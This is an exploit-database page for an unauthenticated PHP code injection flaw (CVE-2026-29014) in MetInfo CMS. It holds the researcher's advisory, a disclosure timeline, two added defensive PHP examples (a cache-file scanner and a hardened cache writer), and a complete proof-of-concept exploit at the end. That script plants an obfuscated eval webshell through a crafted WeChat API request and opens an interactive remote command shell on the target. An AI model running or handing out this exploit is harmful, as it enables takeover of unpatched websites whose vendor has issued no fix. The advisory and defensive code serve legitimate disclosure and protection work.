| Title | Published | Views | Reporter |
|---|---|---|---|
| CVE-2026-29014 | 1 Apr 2026 15:26 | – | circl |
| MetInfo CMS Security Vulnerability | 1 Apr 2026 00:00 | – | cnnvd |
| CVE-2026-29014 | 1 Apr 2026 12:22 | – | cve |
| CVE-2026-29014 MetInfo CMS Unauthenticated PHP Code Injection RCE | 1 Apr 2026 12:22 | – | cvelist |
| EUVD-2026-17875 | 1 Apr 2026 15:31 | – | euvd |
| MetInfo CMS <= 8.1 - Remote Code Execution | 4 Jun 2026 03:48 | – | nuclei |
| CVE-2026-29014 | 1 Apr 2026 13:16 | – | nvd |
| MetInfo CMS 8.1 Shell Upload Mass Exploiter | 24 Apr 2026 00:00 | – | packetstorm |
| MetInfo CMS 8.1 PHP Code Injection | 24 Apr 2026 00:00 | – | packetstorm |
| MetInfo CMS 8.1 WeChat Module Vulnerability Detection Scanner | 24 Apr 2026 00:00 | – | packetstormnews |

---------------------------------------------------------------------------
MetInfo CMS <= 8.1 (weixinreply.class.php) PHP Code Injection Vulnerability
---------------------------------------------------------------------------

[-] Software Link:

https://www.metinfo.cn

[-] Affected Versions:

Versions 7.9, 8.0, and 8.1.

[-] Vulnerability Description:

The vulnerable code is located in the
/app/system/weixin/include/class/weixinreply.class.php script.
Specifically, within the weixinreply::wxAdminLogin() method:

    public function wxAdminLogin($data = array(),$code = '')
    {
        global $_M;
        $weixinapi = load::mod_class('weixin/weixinapi','new');
        $login_code = cache::get("weixin/".$code);
        if ($login_code) {
            cache::put("weixin/".$login_code,$data['FromUserName']);
        }
        return;
    }

User input passed through the "EventKey" and "FromUserName" XML tags
of the HTTP request body when dispatching weixin API requests is not
properly sanitized before being used in calls to the cache::get() and
cache::put() methods, respectively.

Specifically, the $code parameter may include Path Traversal
sequences, causing the cache::get() method to include arbitrary PHP
files. This can be abused to set the $login_code variable to the
"Array" string by including an arbitrary cache file. Subsequently, the
cache::put() method will write the "FromUserName" parameter into the
/cache/weixin/Array.php file, embedding it within double quotes:

    public static function put($file, $data, $type = 'php')
    {
        global $_M;

        load::sys_func('file');
        $save = PATH_CACHE . $file . '.' . $type;
        makefile($save);
        #$data = str_replace(array("\"", "\\"), array("\\\"", "\\\\"), $data);
        if (!is_array($data)) {
            file_put_contents($save, "<?php\ndefined('IN_MET') or exit('No permission');\n\$cache=\"{$data}\";\n?>");
        } else {
            $info = var_export($data, true);
            $info = "<?php\ndefined('IN_MET') or exit('No permission');\n\$cache = {$info};\n?>";
            file_put_contents($save, $info);
        }
    }

This can be exploited by remote, unauthenticated attackers to inject
and execute arbitrary PHP code by abusing PHP's complex curly syntax,
leading to unauthenticated Remote Code Execution (RCE).

NOTE: when MetInfo is running on non-Windows servers, successful
exploitation of this vulnerability requires the /cache/weixin/
directory to exist, which is created when installing and configuring
the official WeChat plugin.
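
A way to check whether cache files already contain injected code, as an added example that is not part of the original advisory or of MetInfo: it tokenizes each file with token_get_all() without ever including it, and reports any token that a constant `$cache` assignment written by cache::put() would not need. The function names, the token allowlist and the directory path in the last comment are assumptions.

```php
<?php
// Added example (not MetInfo or advisory code). Function names are hypothetical.
// A cache file should hold only the IN_MET guard and a constant assignment to
// $cache. Anything else (interpolation, other variables, calls) is reported.

function cache_source_findings(string $source): array
{
    $allowedIds = [T_OPEN_TAG, T_CLOSE_TAG, T_WHITESPACE, T_LOGICAL_OR, T_EXIT,
        T_CONSTANT_ENCAPSED_STRING, T_ARRAY, T_DOUBLE_ARROW, T_LNUMBER, T_DNUMBER];
    $allowedNames = ['defined', 'true', 'false', 'null'];
    $findings = [];
    foreach (token_get_all($source) as $tok) {
        if (!is_array($tok)) {                       // single-character token
            if (strpos('();=,-', $tok) === false) {
                $findings[] = "unexpected character token $tok";
            }
            continue;
        }
        [$id, $text, $line] = $tok;
        $ok = in_array($id, $allowedIds, true)
            || ($id === T_VARIABLE && $text === '$cache')
            || ($id === T_STRING && in_array(strtolower($text), $allowedNames, true));
        if (!$ok) {
            $findings[] = "line $line: " . token_name($id) . ' ' . trim($text);
        }
    }
    return $findings;
}

function scan_cache_dir(string $dir): array
{
    $report = [];
    foreach (glob(rtrim($dir, '/') . '/*.php') ?: [] as $file) {
        $hits = cache_source_findings((string) file_get_contents($file));
        if ($hits) {
            $report[$file] = $hits;
        }
    }
    return $report;
}

// Constructed samples in the layout cache::put() produces for string data.
$head   = "<?php\ndefined('IN_MET') or exit('No permission');\n";
$benign = $head . '$cache="oUserOpenId123";' . "\n?>";
$tamper = $head . '$cache="{${probe()}}";' . "\n?>";

var_dump(cache_source_findings($benign));
var_dump(cache_source_findings($tamper));

// On a server: print_r(scan_cache_dir('/path/to/metinfo/cache/weixin'));
```
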

[-] Proof of Concept:

https://karmainsecurity.com/pocs/CVE-2026-29014.php

[-] Solution:

No official solution is currently available.
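
One way to close both steps described above, as an added example that is neither MetInfo code nor a vendor patch: the cache name is validated before it reaches the filesystem, and string values are written with var_export() instead of being placed inside a double-quoted literal. The names safe_cache_key() and safe_cache_put(), the allowed key pattern and the temporary demo directory are assumptions.

```php
<?php
// Added example (not MetInfo code, not a vendor patch). safe_cache_key() and
// safe_cache_put() are hypothetical; $dir stands in for the weixin cache path.

// Accept only a plain string name: no "../" sequences, and no array that
// string concatenation would turn into "Array".
function safe_cache_key($key): string
{
    if (!is_string($key) || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $key)) {
        throw new InvalidArgumentException('invalid cache key');
    }
    return $key;
}

// var_export() emits strings as single-quoted literals with ' and \ escaped,
// so {$...} and ${...} in the data are never parsed as PHP.
function safe_cache_put(string $dir, $key, $data): string
{
    $file = rtrim($dir, '/') . '/' . safe_cache_key($key) . '.php';
    $body = "<?php\ndefined('IN_MET') or exit('No permission');\n"
          . '$cache = ' . var_export($data, true) . ";\n";
    if (file_put_contents($file, $body, LOCK_EX) === false) {
        throw new RuntimeException("cannot write $file");
    }
    return $file;
}

// Demonstration on constructed input, in a temporary directory.
define('IN_MET', true);
$dir = sys_get_temp_dir() . '/weixin_cache_demo';
is_dir($dir) || mkdir($dir, 0700, true);

$value = 'openid{$probe}"\\\'';   // constructed: curly syntax, quote, backslash
include safe_cache_put($dir, 'demo', $value);
var_dump($cache === $value);      // compares the re-read value with the input

foreach (['../config/tables', ['x']] as $bad) {
    try {
        safe_cache_key($bad);
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', json_encode($bad), "\n";
    }
}
```
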

[-] Disclosure Timeline:

[26/02/2026] - Vendor contacted through several @metinfo.cn and
@mituo.cn email addresses, no response
[07/03/2026] - Tried to reach out to the vendor again, no response
[28/03/2026] - Tried to reach out to the vendor once again, no response
[29/03/2026] - Tried to reach out to the vendor through Weibo, no response
[30/03/2026] - CVE identifier requested
[31/03/2026] - CVE identifier assigned
[01/04/2026] - Public disclosure

[-] CVE Reference:

CVE-2026-29014 has been assigned to this vulnerability.

[-] Credits:

Vulnerability discovered by Egidio Romano.

[-] Original Advisory:

https://karmainsecurity.com/KIS-2026-06

--- packet storm attached poc below: ---
<?php
/*
---------------------------------------------------------------------------
MetInfo CMS <= 8.1 (weixinreply.class.php) PHP Code Injection Vulnerability
---------------------------------------------------------------------------
author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: https://www.metinfo.cn
+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+
[-] Original Advisory:
https://karmainsecurity.com/KIS-2026-06
*/
set_time_limit(0);
error_reporting(E_ERROR);
print "\n+----------------------------------------------------------+";
print "\n| MetInfo CMS <= 8.1 Remote Code Execution Exploit by EgiX |";
print "\n+----------------------------------------------------------+\n";
if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");
if ($argc != 2) die("\nUsage: php {$argv[0]} <URL>\n\n");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "{$argv[1]}app/system/entrance.php?n=include&m=module&c=weixin&a=doapi");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
//curl_setopt($ch, CURLOPT_PROXY, "http://127.0.0.1:8080");
print "\n[+] Injecting PHP webshell\n";
$payload = '<x><MsgType>event</MsgType><Event>SCAN</Event><EventKey>adminlogin&../config/tables</EventKey><FromUserName>{${eval(base64_decode($_SERVER[chr(72).chr(84).chr(84).chr(80).chr(95).chr(67)]))}}.{${die()}}</FromUserName></x>';
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
if (!preg_match("/success/", curl_exec($ch))) die("[-] Injection failed!\n\n");
print "[+] Launching webshell\n";
$phpcode = "chdir('../..'); print '_____'; passthru(base64_decode('%s')); print '_____';";
$payload = '<x><MsgType>event</MsgType><Event>SCAN</Event><EventKey>adminlogin&Array</EventKey></x>';
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
while(1)
{
print "\nmetinfo-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: " . base64_encode(sprintf($phpcode, base64_encode($cmd)))]);
preg_match("/_____(.*)_____/s", curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
}